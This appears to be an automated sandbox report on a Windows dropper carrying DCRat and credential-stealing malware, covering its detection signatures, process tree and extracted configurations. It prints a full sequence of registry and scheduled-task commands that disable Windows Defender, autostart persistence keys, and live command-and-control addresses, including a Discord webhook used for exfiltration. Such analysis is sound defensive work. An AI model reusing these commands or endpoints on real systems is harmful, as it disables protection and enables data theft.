
Windows Analysis Report
FixTsDfhiC.exe

Overview

General Information

Sample name: FixTsDfhiC.exe (renamed because original name is a hash value)
Original sample name: BBD6FFDB33259778F08704696A04891F.exe
Analysis ID: 1545204
MD5: bbd6ffdb33259778f08704696a04891f
SHA1: 0fd836bb4bfc035ff35ebe0fb47e4693cec9e8ba
SHA256: 841eb644979b3c640761762645c9cd26f9bb46e558eaeb7bf0c2a79e761878f4
Tags: exe, Formbook, user-abuse_ch

Detection

Blank Grabber, DCRat, Umbral Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Blank Grabber
Yara detected DCRat
Yara detected Umbral Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Detected VMProtect packer
Disable Windows Defender real time protection (registry)
Disables Windows Defender (deletes autostart)
Drops PE files to the user root directory
Drops PE files with benign system names
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
Sigma detected: Disable Important Scheduled Task
Sigma detected: Files With System Process Name In Unsuspected Locations
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to evade analysis by executing a special instruction (VM detection)
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • FixTsDfhiC.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\FixTsDfhiC.exe" MD5: BBD6FFDB33259778F08704696A04891F)
    • Lunch LaCheatV2.exe (PID: 7344 cmdline: "C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe" MD5: 7DB5128F7A81CC1AF094D8898E79FF21)
      • Lunch LaCheat.exe (PID: 7972 cmdline: "C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe" MD5: B76057DF968A944446F950DD4DDC6AEC)
        • DCRatBuild.exe (PID: 8060 cmdline: "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" MD5: 6E01D4882274684F48E04436103AD57F)
          • wscript.exe (PID: 8108 cmdline: "C:\Windows\System32\WScript.exe" "C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
            • cmd.exe (PID: 7328 cmdline: C:\Windows\system32\cmd.exe /c ""C:\blockweb\TOdra8QNG4wQEWkSimCHh9eVG.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • portrefNet.exe (PID: 7300 cmdline: "C:\blockweb\portrefNet.exe" MD5: 84C6CB042DC58A109DFA2DB8381BEC28)
          • wscript.exe (PID: 8140 cmdline: "C:\Windows\System32\WScript.exe" "C:\blockweb\file.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
        • 52cheatand52rat.exe (PID: 8100 cmdline: "C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe" MD5: 06129FFC46E854930CFCAA754CA1D487)
          • WMIC.exe (PID: 1432 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • conhost.exe (PID: 824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7404 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 7448 cmdline: reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7464 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7480 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7500 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7516 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7532 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7548 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7568 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7588 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7604 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7624 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7640 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7656 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7672 cmdline: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7688 cmdline: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • schtasks.exe (PID: 7704 cmdline: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable MD5: 48C2FE20575769DE916F48EF0676A965)
      • schtasks.exe (PID: 7720 cmdline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable MD5: 48C2FE20575769DE916F48EF0676A965)
      • schtasks.exe (PID: 7736 cmdline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable MD5: 48C2FE20575769DE916F48EF0676A965)
      • schtasks.exe (PID: 7752 cmdline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable MD5: 48C2FE20575769DE916F48EF0676A965)
      • schtasks.exe (PID: 7768 cmdline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable MD5: 48C2FE20575769DE916F48EF0676A965)
      • reg.exe (PID: 7784 cmdline: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7800 cmdline: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7816 cmdline: reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7832 cmdline: reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7848 cmdline: reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7864 cmdline: reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7880 cmdline: reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7896 cmdline: reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7912 cmdline: reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7928 cmdline: reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup
{"SCRT": "{\"y\":\"&\",\"9\":\"*\",\"c\":\"~\",\"w\":\">\",\"z\":\"%\",\"I\":\".\",\"U\":\")\",\"V\":\"`\",\"T\":\"-\",\"O\":\"|\",\"e\":\"#\",\"l\":\"!\",\"d\":\"(\",\"n\":\"$\",\"u\":\" \",\"0\":\"<\",\"5\":\",\",\"D\":\"@\",\"P\":\";\",\"A\":\"_\",\"k\":\"^\"}", "PCRT": "{\"1\":\"`\",\"0\":\"%\",\"U\":\">\",\"B\":\"(\",\"i\":\"*\",\"E\":\";\",\"S\":\"$\",\"j\":\".\",\"N\":\"!\",\"W\":\" \",\"F\":\"&\",\"m\":\")\",\"b\":\"|\",\"V\":\"<\",\"2\":\"-\",\"M\":\"_\",\"k\":\"#\",\"Z\":\",\",\"z\":\"^\",\"d\":\"@\",\"J\":\"~\"}", "TAG": "", "MUTEX": "DCR_MUTEX-m6OlBBIvNMvFZXdW1d4i", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://cp91897.tw1.ru/@=MzY2MWOkV2N", "H2": "http://cp91897.tw1.ru/@=MzY2MWOkV2N", "T": "0"}
{"C2 url": "https://discord.com/api/webhooks/1266665187293794356/BgUJDQi9QXAA0avjRcAiy-uTUWdbVUSk8SQjon--JNjDxPP5bEhE6DLfJFghJ_KLSRhA ", "Version": "v1.3"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security |
C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attempting to enumerate video devices using WMI | ditekSHen |
  • 0x31888:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0x31a0e:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0x31aaa:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

Source | Rule | Description | Author | Strings
00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security |
00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security |
00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
Source | Rule | Description | Author | Strings
36.0.52cheatand52rat.exe.239bb8d0000.0.unpack | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
36.0.52cheatand52rat.exe.239bb8d0000.0.unpack | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security |
36.0.52cheatand52rat.exe.239bb8d0000.0.unpack | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attempting to enumerate video devices using WMI | ditekSHen |
  • 0x31888:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0x31a0e:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0x31aaa:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
34.3.Lunch LaCheat.exe.1b56998.5.unpack | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
34.3.Lunch LaCheat.exe.1b56998.5.unpack | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security |

System Summary

Source: Process started | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: Command: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable, CommandLine: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7404, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable, ProcessId: 7704, ProcessName: schtasks.exe
Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\blockweb\portrefNet.exe, ProcessId: 7300, TargetFilename: C:\Windows\AppReadiness\dwm.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Recovery\ukzoUeHPfeDwGdTDRNL.exe", EventID: 13, EventType: SetValue, Image: C:\blockweb\portrefNet.exe, ProcessId: 7300, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ukzoUeHPfeDwGdTDRNL
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: explorer.exe, "C:\Recovery\ukzoUeHPfeDwGdTDRNL.exe", EventID: 13, EventType: SetValue, Image: C:\blockweb\portrefNet.exe, ProcessId: 7300, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, ParentProcessId: 8060, ParentProcessName: DCRatBuild.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe" , ProcessId: 8108, ProcessName: wscript.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-30T08:43:02.046365+0100 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.4 | 49745 | 92.53.106.114 | 80 | TCP
2024-10-30T08:43:13.265199+0100 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.4 | 49803 | 92.53.106.114 | 80 | TCP
2024-10-30T08:43:27.937516+0100 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.4 | 49890 | 92.53.106.114 | 80 | TCP
2024-10-30T08:43:51.421636+0100 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.4 | 50013 | 92.53.106.114 | 80 | TCP
2024-10-30T08:43:59.906040+0100 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.4 | 50016 | 92.53.106.114 | 80 | TCP
2024-10-30T08:44:07.859223+0100 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.4 | 50019 | 92.53.106.114 | 80 | TCP

AV Detection

Source: FixTsDfhiC.exe | Avira: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\blockweb\WmiPrvSE.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\blockweb\RuntimeBroker.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Windows\AppReadiness\dwm.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\Nu8jJRNGRr.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Avira: detection malicious, Label: HEUR/AGEN.1307507
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\Default\ApplicationFrameHost.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\blockweb\portrefNet.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: 0000002C.00000002.1950988676.000000001256F000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"SCRT": "{\"y\":\"&\",\"9\":\"*\",\"c\":\"~\",\"w\":\">\",\"z\":\"%\",\"I\":\".\",\"U\":\")\",\"V\":\"`\",\"T\":\"-\",\"O\":\"|\",\"e\":\"#\",\"l\":\"!\",\"d\":\"(\",\"n\":\"$\",\"u\":\" \",\"0\":\"<\",\"5\":\",\",\"D\":\"@\",\"P\":\";\",\"A\":\"_\",\"k\":\"^\"}", "PCRT": "{\"1\":\"`\",\"0\":\"%\",\"U\":\">\",\"B\":\"(\",\"i\":\"*\",\"E\":\";\",\"S\":\"$\",\"j\":\".\",\"N\":\"!\",\"W\":\" \",\"F\":\"&\",\"m\":\")\",\"b\":\"|\",\"V\":\"<\",\"2\":\"-\",\"M\":\"_\",\"k\":\"#\",\"Z\":\",\",\"z\":\"^\",\"d\":\"@\",\"J\":\"~\"}", "TAG": "", "MUTEX": "DCR_MUTEX-m6OlBBIvNMvFZXdW1d4i", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://cp91897.tw1.ru/@=MzY2MWOkV2N", "H2": "http://cp91897.tw1.ru/@=MzY2MWOkV2N", "T": "0"}
Source: 36.0.52cheatand52rat.exe.239bb8d0000.0.unpack | Malware Configuration Extractor: Umbral Stealer {"C2 url": "https://discord.com/api/webhooks/1266665187293794356/BgUJDQi9QXAA0avjRcAiy-uTUWdbVUSk8SQjon--JNjDxPP5bEhE6DLfJFghJ_KLSRhA ", "Version": "v1.3"}
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | ReversingLabs: Detection: 87%
Source: C:\Program Files\7-Zip\Lang\ukzoUeHPfeDwGdTDRNL.exe | ReversingLabs: Detection: 87%
Source: C:\Program Files\Windows Portable Devices\ukzoUeHPfeDwGdTDRNL.exe | ReversingLabs: Detection: 87%
Source: C:\ProgramData\Package Cache\{D5D19E2F-7189-42FE-8103-92CD1FA457C2}v14.36.32532\ukzoUeHPfeDwGdTDRNL.exe | ReversingLabs: Detection: 87%
Source: C:\Recovery\ukzoUeHPfeDwGdTDRNL.exe | ReversingLabs: Detection: 87%
Source: C:\Users\Default\ApplicationFrameHost.exe | ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | ReversingLabs: Detection: 84%
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | ReversingLabs: Detection: 75%
Source: C:\Users\user\Videos\ukzoUeHPfeDwGdTDRNL.exe | ReversingLabs: Detection: 87%
Source: C:\Users\user\ukzoUeHPfeDwGdTDRNL.exe | ReversingLabs: Detection: 87%
Source: C:\Windows\AppReadiness\dwm.exe | ReversingLabs: Detection: 87%
Source: C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe | ReversingLabs: Detection: 87%
Source: C:\Windows\Performance\WinSAT\DataStore\ukzoUeHPfeDwGdTDRNL.exe | ReversingLabs: Detection: 87%
Source: C:\Windows\Setup\State\ukzoUeHPfeDwGdTDRNL.exe | ReversingLabs: Detection: 87%
Source: C:\blockweb\RuntimeBroker.exe | ReversingLabs: Detection: 87%
Source: C:\blockweb\WmiPrvSE.exe | ReversingLabs: Detection: 87%
Source: C:\blockweb\portrefNet.exe | ReversingLabs: Detection: 87%
Source: C:\blockweb\ukzoUeHPfeDwGdTDRNL.exe | ReversingLabs: Detection: 87%
Source: FixTsDfhiC.exe | ReversingLabs: Detection: 92%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | Joe Sandbox ML: detected
Source: C:\blockweb\WmiPrvSE.exe | Joe Sandbox ML: detected
Source: C:\blockweb\RuntimeBroker.exe | Joe Sandbox ML: detected
Source: C:\Windows\AppReadiness\dwm.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | Joe Sandbox ML: detected
Source: C:\Users\Default\ApplicationFrameHost.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | Joe Sandbox ML: detected
Source: C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | Joe Sandbox ML: detected
Source: C:\blockweb\portrefNet.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | Joe Sandbox ML: detected
Source: FixTsDfhiC.exe | Joe Sandbox ML: detected
